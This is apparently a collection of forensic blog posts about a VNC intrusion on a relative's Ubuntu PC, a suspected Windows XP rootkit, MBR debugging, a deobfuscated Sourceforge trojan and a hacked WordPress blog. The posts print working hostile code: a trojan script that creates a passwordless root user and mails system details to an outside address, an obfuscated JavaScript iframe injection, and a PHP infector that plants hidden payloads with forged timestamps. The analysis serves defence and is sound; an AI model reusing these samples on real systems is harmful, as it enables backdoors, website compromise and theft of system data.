Output of the Mimikatz plugin for Volatility

Good job ;-)

After a phone conversation with him, I realized that his computer was hacked a few days before. He told me that he saw the mouse moving by itself, but what happened then was not clear to him. Anyway, he did not feel the urge to call me immediately. Needless to say that his knowledge on computers is low.
I immediately started to investigate.

How the computer was hacked

The computer is running Ubuntu . I suspected a vulnerability, but I soon realized that it was much simpler than that: by mistake, a VNC session was left opened!

x11vnc with no authentication and no logging… Damned!

What the attacker did

What he tried first was to create a user to maintain access. But the scammer was probably low tech and soon abandonned.

Here is his sequence in the shell history:

261 adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M xxxcx
262 useradd -d /home/xxxcx -m nokia00
263 passwd xxxcx

Command #261 failed, because of unproper syntax. I guess he meant useradd, as adduser on Debian/Ubuntu has totally different options. Note that what he was trying to do is create a new root user named xxxcx (with no home directory).

He probably did not realize his mistake, but yet tried this time useradd with fewer options in command #262. This time, he would create the home directory and name the user nokia00… Why not. Alas, the command can’t work as a standard user!

Then, command #263: he tried to change the current password, but again he failed as it is required to know it before updating it…

And that’s it. Pretty lame, isn’t it? He got quickly discouraged and started to use exclusively Firefox.

On-line shopping

With support of forensicswiki.org, I dumped the full Firefox profile on my computer and started to analyze it with the Sqlite Manager extension.

Sorry but I will be hiding private info and sensitive data that could be used for a legal action.

I got most info from the files cookies.sqlite and places.sqlite.

cookies.sqlite: a lot of info: email and billing info used by the attacker

places.sqlite: attacker’s browsing history, with interesting purchase references in GET parameters

The guy didn’t loose time, he knew precisely what he wanted and what to do.

1. He first visited two websites to localize the computer: ip2location.com and ip-tracker.org. You may think that it is a strange first move, but I will come back on that later as I have a theory.
2. Now that he knew in what country he was (country XXX), he started to do online shopping.

It is interesting that his online shopping was all linked to web hosting:

• templates from dreamtemplates.com
• a .net domain name (with however part of the prefix being localized accordingly to the country suffix).
• hosting at netfirms.com and mg1host.com

Note that the criminal used a online payment platform that I never heard about before: 2checkout.com aka 2co.com.

Unfortunately, when I investigated, all cookies were expired so I could not connect to the criminal’s account.

Yet, it still had some valuable info. The most interesting info I found was from a cookie from dreamtemplates.com. I got all the billing info used by the attacker:

• attacker’s gmail address (probably compromised or anonymous)
• Name and address for the billing, that sounded real…

Also, GET parameters in URLs were very interesting.

In some of them, you can guess the amount of the purchase he did. He for sure bought stuff for at least a total of 500$. But it is without counting the stuff that I cannot guess from URLs, so it is probably sensibly much more in reality.

But, even better, some had order ids. Hey, wait! Let’s have a look on the 2co website:

2co order review = order number + email

Hmmm… we have the email address and the order number… bingo!

Now, we have at least all info of the credit card owner, certainly the biggest victim in this mess.

Conclusion

That’s it for now. We are still in the process of transmitting the info to the police and alerting the victim.

Here are a few thoughts by the way:

• Logging, always logging! It is a pity that we know literally nothing about the scammer source ip address. All his actions were made from within a VNC session and it leaves no trace. He may have came from another proxy, but who knows… I still have a little hope that under legal request, the Internet provider of my relative will be able to provide some logs.

• Nowadays, it is still difficult to report such a case to the police and to help the victim. The local police is at loss and does not really know what to do. The cyber section is slow to answer, probably crawling under requests (mostly spam stuff?).

• Not every one has a computer specialist among friends or relatives. It must be a terrible experience to see the police coming to you for a fraud one hasn’t committed directly. Few people, even sometimes among IT professionals, understand that.

• The criminal seemed low tech, but very organized at the same time.
  Here is my theory: he probably has a precise goal and is not loosing time.
  He follows a process: geo-localize the victim or target a country and choose accordingly financial data in his database.
  Then, he purchases stuff from a list of items he needs or he is requested.
  Finally, if he could not find a way to maintain access in seconds, he leaves. Mission done: this scammer is probably doing it full time, as a professional activity. Lame but efficient for the crime industry.

• The credit card info was accompanied with private info: real name and address. We all know that but it is always shocking to think how it can easily obtained: compromised computer, hacked online shop or database, dishonest employee (e.g. at the hotel), etc.

• The websites  will probably be used for more scamming and illegal activities. I am going to monitor the domain I got for a while.

Keep wired for updates.

I decided to analyze one the crash I experienced during registry analysis.
I could reproduce all the time a BSOD with Regshot. I thought it would be nice to see what I could get with WinDBG.

I had my environment set up with the suspicious VM configured to debug activated on the serial port, which is a simple pipe on Mac OS X.
Another VM is configured with a serial port as the other end of this pipe, and WinDBG attached to it.
Another method would be to just configure Windows to create a crashdump file with kernel symbols, that you can later load into WinDBG. Of course, the first method offers more opportunities to check and play with the live system.

Then, I just boot the target and trigger the crash, simply by starting a scan with Regshot:

Windows then crashes, WinDBG catches the exception and stops.

So what do we have ?

First, the error type, PAGE_FAULT_IN_NONPAGED_AREA (50), means that an instruction pointed to an invalid memory address. Let’s check this.

With !analyse -v, you get the full error dump.

Crashing Instruction

It shows the function (nt!CmpGetValueKeyFromCache, offset 0x89) and the memory address where the crash was triggered.

The instruction at this address is:

80637807 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]

This instruction is trying to copy 8 bytes at the address pointed by EDI.
EDI has the value of 0xe1285050 at execution time.

And what do we have at this memory location ?

EDI pointing to invalid memory section

Nothing indeed. Note that this corruption persists at every boot.

So what can we conclude?
We can certainly exclude hardware failure, because it is a virtual machine and because the corruption always occur at the same memory region, even after a reboot.
At least, I can now be sure that something in the kernel is definitely corrupted.

Could it be a rootkit trick? Still the question remains, but to me it now looks very, very suspicious. Some rootkit code, poorly written, could have sat in this non-paged memory area and been paged out, causing the BSOD. I have not much knowledge about it at this time but I am going to search on this. At least, I now have good starting point to look at.

That’s all for today, folks. I wrote it while I am still working on it, so sorry if it looks rough and incomplete. It is sort of live, thoughts are still in process.

Again, I am looking forward to reading your comments and suggestions. (Hopefully) there will be a part IV!

It’s a lot of fustration. There must be something just there, but my findings are certainly limited by my skills.

I attach here some of the main outputs of Volatility. As far as I can tell:

• no evidence of injection or kernel hooking
• no suspicious process
• no suspicious driver
• no suspicious registry entry
• etc.

Based on my observations, I first tried to narrow my investigations (drivers and hooks) but as I could not find anything, I ended dumping most of Volatility outputs in hope to see something unusual. I also compared them with a fresh Windows XP SP3 install. I extracted keyboard related drivers (keyboard.sys, kbdclass.sys, i8042prt.sys), hashed them, scanned them: there were native. I am less sure on how to deal with the software certificate system, but I did checked all Microsoft and root certificates in the bank along with their signature with a clean system: nothing wrong.

Dear reader, any help or tip is welcomed! Am I missing something obvious? Could it be possibly not a rootkit but some kind of corruption? If so, how to detect it?

Just drop me an e-mail if you want to have a look on the dump itself.

Volatility outputs:

• apihooks
• driverscan
• handles
• idt
• ldrmodules
• malfind-yara
• malfind
• ssdt
• svcscan
• threads

For now, I can’t tell much about the context, mainly because it may – or may not – involve other people. The only thing I am interested in is to spot the issue and understand precisely what is going on.

What makes the case really interesting though, is that it occurred on a fresh install of a Windows XP virtual machine. I aimed it to be a clean malware reversing snapshot. I noticed the weired behavior minutes after finishing the system install and setting up a bunch of reversing and live analysis tools.

So I bet that if I got some malware, it probably comes from one of those. At this time, unfortunately, there are too many and I could not spot the exact time, so I can not start the analysis from this angle.

This article is almost written in live, so pardon my mistakes. I will update it as soon as I find something new. Of course, I am really expecting your feedback, suggestions and corrections. I see it as a great opportunity to learn, even though this one may not be the easiest…

Symptoms

Two things alerted me quickly.

The first one was, at a point, the permanent failure of going through the full windows update process. Believe me, I have tried all ways.

The second one was the weird dialog when trying to access to the keyboard layout settings. It says “Incompatible driver detected“. To me, this looks like there is a keylogger somewhere…

Suspicious activities: the keyboard driver and windows update seem to be messed

Then, as I started to check around, more odd stuff came out.

I fired up Process Explorer, and soon realize that it was “unable to verify” the signatures of all the running Windows processes. I could not find anything else suspicious, though (no odd process, memory content looks normal, etc.).

On the left, Process Explorer fails to validate any Windows process.
On the right, expected behavior on a clean system.

Ok, while I am with the Sysinternal suite, why not scanning with Rootkit Revealer:

Rootkit Revealer cannot access to the SYSTEM hive of the registry

Interesting… and what about GMER:

GMER crashes when accessing the registry…

Oops! Now it crashes when it is accessing the registry…

For the fun, let’s see what happens if we try to set up an antivirus (Security Essentials):

Windows certificate warning when installing… Microsoft Security Essentials!!!

Nice one! Very suspicious! Note that after a full scan, Security Essentials reports me that the system is clean and everything is fine. I am so relieved. :)

Curious to see how my certificates are, I run certmgr.msc. I compared all Microsoft root certificates with a clean machine and could not see anything different. But again something happened:

certmgr.msc crashes

Oh, just one of my last attempts to do live analysis (this the WinPcap setup included with Wireshark):

WinPCAP installation also fails

Ok, so enough played. The thing seems to be nicely done, and live analysis is going to be way too hard and unreliable.

Memory Analysis

This is where I am now. I reverted to a snapshot prior to my live analysis attemps, confirmed the strange behaviors are still observable, and suspended the VM to get the vmem file.

So I have spent the last hours scanning the memory with, of course, Volatility.

So far, I have to confess that I found NOTHING. But analyzing the memory can be a harsh process when it comes to sophisticated threats, and I may have reached the limits of my skills.

But, anyway, I could not dream of a greater and more exciting opportunity to learn!

My discoveries, if there are, will be published in another article.

UPDATE: I forgot to tell that it is a Windows XP SP3 machine, but not fully updated due to the issues.

Sometimes, you may detect that some suspicious network traffic coming out from a machine. In general, it is easy to spot the process from which the packets originate. You somehow connect to the PC and look for open sockets.

But sometimes, the behavior may be very sneaky, consisting of one or two packets, at rare and random intervals. Unless you spend all the day before the screen, it may be very difficult to trace.

Especially with stock tools or without installing any intrusive hardware, which is also the reason why I did this tool. On a production server, you want to install as little dependencies as possible, right?

So here is the Soktspy, a python script that easily build into a portable and standalone executable to deploy on the target machine.

Once launched, it just loops in the background and log sockets that are created for some given peers (the IP addresses you found involved in the suspicious network activity).

Maybe, some other tool exist, but I could not find anything similar. Let me know if you have any suggestion. Anyway, it was a nice exercise to do :)

Download

soktSpy v1.2

Pre-requisites

• Install Visual C++ Runtime libraries with vcredist_x86.exe (not necessary if the target machine happens to have Python already installed)

How to use

• Copy soktSpy.exe and its configuration file config.cfg.
• Edit config.cfg with the IP you want to monitor
• Start soktSpy.exe.

Then, as soon as the sneaky process will send out a packet toward the monitored IP, a log record will be triggered:

The log file contains the following info, in that order:

• Detection time (based on the system local time)
• Process creation time
• PID
• Process Name
• Protocol Family (2 = IPv4, 23 = IPv6)
• Process Owner
• Source socket (IP, port)
• Destination socket (IP, port)
• Socket Status

Future Plans

Please tell me if you have any idea on how to improve it.

For now, I plan to add a feature that will dump the memory of the suspicious processes when it is executing.

Prerequisite :

• IDA Pro (6.0) with the IDA Python plug-in (1.4.3)

Steps :

1. Prepare your forensic disk image.
   In general, it is that simple :

   $ dd if=<source> of=disk.img bs=65536 conv=noerror

   Or :

   $ ddrescue -n <source> <dest> file.log

   Check the disk geometry using :

   $ fdisk -luc disk.img

   These values will be useful for step 5.
   However, if you have an exotic disk, it may be much trickier. For example, I got some geometry errors with a flash disk when using Bochs at step 11. Special thanks to Gene Cumm from the bochs-developpers mailing list who gave me the tip to specify the geometry to dd :

   $ dd if=input of=output bs=2064384 count=507

Refer to CHS if you wonder how to get these values.

2. Extract the MBR from the disk or from the image you just took.

   $ dd if=<source> of=mbr.dump bs=512 count=5

3. Download and install the Bochs x86-64 emulator, which comes with a debugger that will work nicely with IDA.
4. Download this archive from Hexblog (IDA Pro’s blog). We will use two files from there : bochrc, wich is the configuration file for Bochs, and mbr.py which a python file helpful from preparing the debugging environment.
5. Copy bochrc in your working directory and edit the following line to match your disk image geometry :

   ata0-master: type=disk, path="sdb.img", mode=flat, cylinders=507, heads=64, spt=63

   Before going on, you may test that Bochs can use the image with these settings :

   C:\>"c:\Program Files\Bochs-2.4.5\bochsdbg.exe" -f bochsrc -q

6. In the same directory, copy mbr.py and edit the following settings :

   # Some constants
   SECTOR_SIZE = 512
   BOOT_START  = 0x7C00
   BOOT_SIZE   = 0x7C00 + SECTOR_SIZE * 4
   BOOT_END    = BOOT_START + BOOT_SIZE
   SECTOR2     = BOOT_START + SECTOR_SIZE
   MBRNAME    = "mbr.img"
   IMGNAME     = "sdb.img"

7. Now open a console and type :

   C:\> mbr update

8. With IDA Pro, open the boshrc file. IDA should recognize the format and set the proper settings.
9. From the menu, open File/Script File and select mbr.py. It will close IDA after execution.
10. Open again your *.idb file, set a breakpoint at 0x7C00.
11. Start the debugger.

You should now be able to go ahead and debug the MBR step by step.

References :

• Hexblog : Develop your master boot record and debug it with IDA Pro and the Bochs debugger plugin
• MISC Magazine #53 : Votre MBR pris en otage ! – Nicolas Brulez (Kaspersky labs)
• Bochs User Manual : Chapter 8, Tips and Techniques

Actually, the purpose of dns-add was very intriguing : update your DNS in one command !

The output should look like this:

...::: ISP-fW DNS add v1.0  :::... http://isp-fw.sourceforge.net/
--== copyleft 2005-2006 ==-- | Free memory:         864
contact isp.devel@gmail.com
You can add up to 9 DNS servers, enter a number from [0-9]: 2
Enter DNS1: 192.168.157.193
Enter DNS2: 192.168.157.251
Done adding 2 DNS!
DNS 192.168.157.193 responded in 0.256 ms
DNS 192.168.157.251 responded in 0.112 ms

Who would need it these days where all distros include tools and script to update the DNS with DHCP. At worst, it is just a matter of opening an editor to add two lines in /etc/resolv.conf. Done in 10 seconds.

To enjoy dns-add, we are supposed to compile the source code. Let’s have a look at it first.

It gets quickly obvious that there could be something nasty. The code is clearly obfuscated, to make it difficult to read:

• not much commented,
• a bunch of strange variables like “\026\243\314\376\220\366\154\166\346\334\005\116\360\114\015\231”. Could be the real code, hidden,
• None of the visible stuff seems to do anything on the DNS.

So now, let’s try to find out what’s behind all that. As we have the source code, the idea is to understand what the code is doing, so that we can write a snippet at the right place to just read the deciphered and potentially malicious code. That’s the easiest way, no need to disassembly and do memory forensic.

A good practice is to look for some pieces of code on the web, as developpers are lazy and often reuse already existing code. Doing that, you can save a lot of time.

Bingo ! There is a code almost entirely identical there.
We learn that the code, as old as 6 years old, actually hid a shell trojan instead of beeing a Red Hat update as claimed.

There is clearly a risk, so we must check what the code of dns-add contains. Here more hints help us again about the encoding used : some comments and a function name mention RC4 (or ARC4).

So let’s see how RC4 works and compare it with its possible implementation in dns-add.
Rougly, RC4 is just an improved XOR whith the help of a lot of keys permutations. I found a clear and short description there :

RC4 has two phases: key setup and ciphering.

The key setup phase is only done once per message and starts by initializing the entire state array so that the first state element is zero, the second is one, the third is two, and so on.

The state array is then subjected to 256 mixing operations using a loop that steps i through the values from zero to 255.

Each mixing operation consists of two steps:
Add to the variable j the contents of the ith element of the state array and the nth element of the key, where n is equal to i modulo the length of the key. (remember, the key here means the 10 byte IV at the front of the file, (or the one your program creates, if encoding), and the given key on the command line. (Key+IV)
Swap the ith and jth elements of the state array.

After the entire mixing loop is completed, i and j are set to zero.

During the ciphering operation, the following steps are performed for each byte of the message:

The variable i is incremented by one
The contents of the ith element of ‘State’ is then added to j
The ith and jth elements of ‘State’ are swapped and their contents are added together to form a new value n.
The nth element of ‘State’ is then combined with the message byte, using a bit by bit exclusive-or operation (XOR), to form the output byte.
The same ciphering steps are performed for encryption and for decryption.

void key(void * str, int len) for setting the key setup phase and void arc4(void * str, int len, char *hint) for the deciphering phase do exactly what’s described above.

They are called by char * xsh(int argc, char ** argv), which we are going to look at carefully now.

This function succevely setup all keys and decipher all the hardcoded vars. Note that a function, chkenv, setup a variable in the environment, based on the PID (and other tricks). It is not useful in the present case, but it could be developped further and used for example to avoid over-infections.

What’s interesting is actually the bottom of the function, where the guy actually builds the shellcode, putting alltogether the pieces of deciphered code.

j = 0;
varg[j++] = argv[0];		/* My own name at execution */
if (ret && *opts)
	varg[j++] = opts;	/* Options on 1st line of code */
if (*inlo)
	varg[j++] = inlo;	/* Option introducing inline code */
varg[j++] = scrpt;		/* The script itself */
if (*lsto)
	varg[j++] = lsto;	/* Option meaning last option */
i = (ret > 1) ? ret : 0;	/* Args numbering correction */
while (i < argc)
	varg[j++] = argv[i++];	/* Main run-time arguments */
varg[j] = 0;			/* NULL terminated array */

Then, it is launched with execvp:

#if DEBUGEXEC
debugexec(shll, j, varg);
#endif
execvp(shll, varg);
return shll;

Before testing further, it is safer to comment out the execvp line.

Now, we just need to retrieve the shellcode, so we just add this lazy piece of code (to insert right before #if DEBUGEXEC):

FILE *fout;
char **tmp;
tmp = varg;
fout = fopen ("dns-test","w");
do {
  fprintf (fout, *tmp);
}
while (*tmp++ != NULL);
fclose (fout);

Here we go :

$ ./dns-add
$ cat shellcode
./dns-add-c                               #!/bin/bash

dnsfile="/etc/resolv.conf"
failed='\e[1;31m'failed'\e[0m'
ok='\e[1;34m'ok'\e[0m'

function dns_add(){
mv -f $dnsfile $dnsfile.back
for (( i=1; i <= $dns_nr; i++ )) do
    echo -n "Enter DNS${i}: "
    read dns;
    echo "nameserver $dns" >> $dnsfile;
done
echo "Done adding $dns_nr DNS!"
echo
for i in `cat $dnsfile | cut -d " " -f 2`; do
    if [ `ping -c 1 $i | grep -c "100%"` -eq 1 ]; then
            echo -e "DNS $i $failed to respond => request timeout :( "
    else
        echo -ne "DNS $i responded in ";
        ping -c 1 $i | grep icmp_seq | cut -d "=" -f 4;
    fi
done
}

clear
echo -e "...::: ISP-fW DNS add v1.0  :::...""\e[1m\e[36;40m" "http://isp-fw.sourceforge.net/\e[0m ";
echo -e "--== copyleft 2005-2006 ==-- | Free memory: $(free -m|grep cache:|cut -d ":" -f2|cut -c12-22)";
echo "contact isp.devel@gmail.com"
echo
echo -n "You can add up to 9 DNS servers, enter a number from [0-9]: ";
read dns_nr;

case $dns_nr in
  [0-9]         ) dns_add;;
  [[:lower:]]   ) echo "$dns_nr is not a number!";;
  [[:upper:]]   ) echo "$dns_nr is not a number!";;
  *             ) echo "$dns_nr is not a number!";;
esac
./dns-add

That's it. A big C file just for this lame shell script. The good news is that it does what it says. There is no malicious purpose, for now, it's nothing else than a (bad) joke.

In the case of the original malware, it was more harmfull :

#!/bin/sh
cd /tmp/
clear
if [ `id -u` != "0" ]
then
        echo "This patch must be applied as \"root\", and you are: \"`whoami`\""
        exit
fi
echo "Identifying the system. This may take up to 2 minutes. Please wait ..."
sleep 3
if [ ! -d /tmp/." "/." "/." "/." "/." "/." "/." "/." "/." " ]; then
 echo "Inca un root frate belea: " >> /tmp/mama
 adduser -g 0 -u 0 -o bash >> /tmp/mama
 passwd -d bash >> /tmp/mama
 ifconfig >> /tmp/mama
 uname -a >> /tmp/mama
 uptime >> /tmp/mama
 sshd >> /tmp/mama
 echo "user bash stii tu" >> /tmp/mama
 cat /tmp/mama | mail -s "Inca o roata" root@addlebrain.com >> /dev/null
 rm -rf /tmp/mama
 mkdir -p /tmp/." "/." "/." "/." "/." "/." "/." "/." "/." "
fi

bla()
{
  sleep 2
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 2
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 3
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 4
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 1
  echo "#"
  sleep 1
}

echo "System looks OK. Proceeding to next step."
sleep 1
echo
echo -n "Patching \"ls\": "
bla
echo -n "Patching \"mkdir\": "
bla
echo
echo "System updated and secured successfuly. You may erase these files."
sleep 1
./badexec 'exec '%s' "$@"' "$@"

Technically, at the end, it is rather basic. However, it is successful in the way that it hides its purpose to most people.
What's not clear yet is the poster purpose. Fun ? Any other weired feeling ? Or just testing the capacity of the community to detect maliscious software ? If so, was he just curious or does he have any future plan ?
Maybe I should ask him.

Anyway, how many people opened and read the code ? Especially on a community driven website where people tend to have a dangerous feeling of trust and safety : it can't be malicious, the author offers the source code and nicely shares his work, right ?
And among the few people who checked the code, who really understood it ? Not everyone is an IT specialist. And even among them, not everyone is a developper or can read C.

It highlights well several things :

• social engineering is multi-platform ! We are often more vulnerable than our systems. Linux user or not.
• software published with the source code doesn't mean safe software.

As much as possible, download software exclusively from the official repositories of your favorite distribution (openSUSE ;)).
If you really have to use code from an untrusted source, check it, or wait for the right people to do it! Don't just grab any code, compile it and execute it blindly.

At the same time as open-source software grows, we, users, and also websites like Sourceforge will have to be more carefull about the content we download.

* Update *

I did contact the author and didn't get any answer.
I reported the issue to Sourceforge, which deleted the account hosting dns-add, as it violated the website policies.

You can download the source code dns-add.tar.gz if you want to analyse it.

It looks like some spammer managed to inject some PHP code into almost all *.php files of WordPress.
It was not just like the classic SQL injection that is usually used to post some malicious post.

The following code was added :

<?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

It make me think that there is a serious vulnerability somewhere on WordPress or a plugin, though my versions were up-to-date.

Now the blog is back to normal, after a clean reinstallation (erased all the former files).

I am not the only one to experience this mess.

For now, the blog is running with a minimal number of plugin – just akismet, actually – until the cause of that gets clearer.

Not a lot of plugins runned before, so it mainly means that the OpenID support for authentication is cut off.

As my php knowledge is very low, anyone having some tips is welcome. I love WordPress, I would like to avoid looking for another platform or switch to static html !

—

UPDATE 06/13/2008 :
As C.S Lee suggested in a comment, there were a very suspicious wp-stats.php file in the root of my hacked archive.

There is the code :

<?php

@error_reporting(E_ALL);
@set_time_limit(0);
mt_srand(crc32(microtime()));
  
  
define('SHCODE', 'PDaWYgKCRjb2RlID0gQGZyZWFkKEBmb3BlbigkSFRUCmVjaG8gIjwvcHJlPiI7Cj8+');

$pres = array('lib_','co_','pre_','net_','func_','ad_','ext_','new_','old_','fix_','fixed_','na_','av_','fx_');  
$fui = $pres[array_rand($pres)];

global $HTTP_SERVER_VARS;
$START = time();
$WD_TIMEOUT = array(8, 7, 6, 6, 5, 5, 5, 5, 0);

function my_fwrite($f, $data) {
  global $CURFILE;
  $file_mtime = @filemtime($f);
  $file_atime = @fileatime($f);
  $dir_mtime = @filemtime(@dirname($f));
  $dir_atime = @fileatime(@dirname($f));
  if ($file_h = @fopen($f, "wb")) {
    @fwrite($file_h, $data); @fclose($file_h);
    if ($file_mtime) {
      @touch($f, $file_mtime, $file_atime);
    } elseif (@filemtime($CURFILE)) {
      @chmod($f, @fileperms($CURFILE));
      @touch($f, @filemtime($CURFILE), @fileatime($CURFILE));
      @chgrp($f, @filegroup($CURFILE));
      @chown($f, @fileowner($CURFILE));
    };
    if ($dir_mtime) @touch(@dirname($f), $dir_mtime, $dir_atime);
    return $f;
  } else {
    return '';
  };
};

function ext($f) {
  return substr($f, strrpos($f, ".") + 1);
};

function walkdir($p, $func='_walkdir', $l=0) {
  global $START;
  global $WD_TIMEOUT;
  global $FL;
  $func_f = "{$func}_f";
  $func_d = "{$func}_d";
  $func_s = "{$func}_s";
  $func_e = "{$func}_e";
  if ($dh = @opendir("$p")) {
    if (function_exists($func_s)) {
      if ($func_s($p, $l)) return 1;
    };
    while ($f = @readdir($dh)) {
      if (time() - $START >= $WD_TIMEOUT[$l] ) break;
      if ($f == '.' || $f == '..' ) continue;
      if (@is_dir ("$p$f/") ) walkdir("$p$f/", $func, $l+1);
      if (@is_dir ("$p$f/") && function_exists($func_d))
        $func_d("$p$f/", $l);
      if (@is_file("$p$f" ) && function_exists($func_f))
        $func_f("$p$f" , $l);
    };
    closedir($dh);
    if (function_exists($func_e)) $func_e($p, $l);
  };
};

function r_cut($p) {
  global $R;
  return substr($p, strlen($R));
};

function say($t) {
  echo "$t\n";
};

function testdata($t) {
  say(md5("mark_$t"));
};

$R = $HTTP_SERVER_VARS['DOCUMENT_ROOT'];
$CURFILE = $HTTP_SERVER_VARS['DOCUMENT_ROOT'] .
  $HTTP_SERVER_VARS['SCRIPT_NAME'];
echo "<pre>";
testdata('start');
$fe = ext($CURFILE);
if (!$fe) $fe = 'php';
//$FN = "namogofer.$fe";

function _walkdir_s($d, $l) {
  global $FCNT;
  $FCNT = array( 'fn' => '', 'dir' => 0, 'file' => 0, 'simtype' => 0 );
};

function _walkdir_d($d,$l) {
  global $FCNT;
  $FCNT['dir' ]++;
};

function _walkdir_f($f,$l) {
  global $FCNT, $CURFILE;
  $FCNT['file']++;
  if (ext($f) == ext($CURFILE)) $FCNT['simtype']++;
};

function update_passwd($data)
  {
  global $FCNT;
  $password = "";
  $possible = "abcdefghijklmnopqrstuvxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~!@#$%^&*"; 
  $i = 0;
  while ($i < 15) 
    { 
    $char = substr($possible, mt_rand(0, strlen($possible)-1), 1);
    if (!strstr($password, $char)) 
      { 
      $password .= $char;
      $i++;
      }
    }
  $FCNT['passwd'] = $password;
  $md5password = md5($password);
  return preg_replace("|define\('PASSWD',\s*'(.*)'|", "define('PASSWD','$md5password'", $data);
  }

function notinf($ar, $tx)
  {
  $R = true;
  foreach ($ar as $ca)
    {
    //echo "pass ".substr($tx, 0, strlen($ca))." in $tx for $ca\n";
    if ("$ca" == substr($tx, 0, strlen($ca)))
      {
      $R = false;
      //echo "gotcha\n";
      break;
      }
    }
  return $R;
  }

function _walkdir_e($d,$l) 
  {
  global $C, $FCNT, $FN, $fui, $pres;
  
    $the_data = base64_decode(SHCODE);
    $the_dir = opendir("$d");
    $is_php=false;
    if ($the_dir)
        while($cfile = readdir($the_dir))
            {
            if(
                $is_php=
                
                (('.php' == substr($cfile, -4))and
                 notinf($pres, $cfile)and
                ($cfile!='index.php'))
                 
              )
              {
              $FN = "$fui$cfile";
              break;
              }
              else
              {
              //echo "pass $cfile\n";
              }
            }
                         
        if ( $is_php and my_fwrite("$d$FN", str_repeat("\n",100) . str_repeat('', 150) .
                    update_passwd($the_data . str_repeat(' ', 150) . "\n" . str_repeat("\n", 100))))
                    {
                    $FCNT['fn'] = r_cut("$d$FN");
                    say(implode(" ", $FCNT));
                    }

  };

walkdir("$R/");
testdata('end');
?>

I will try anyway to put a deeper look when I have a little time : now, I have to go to work.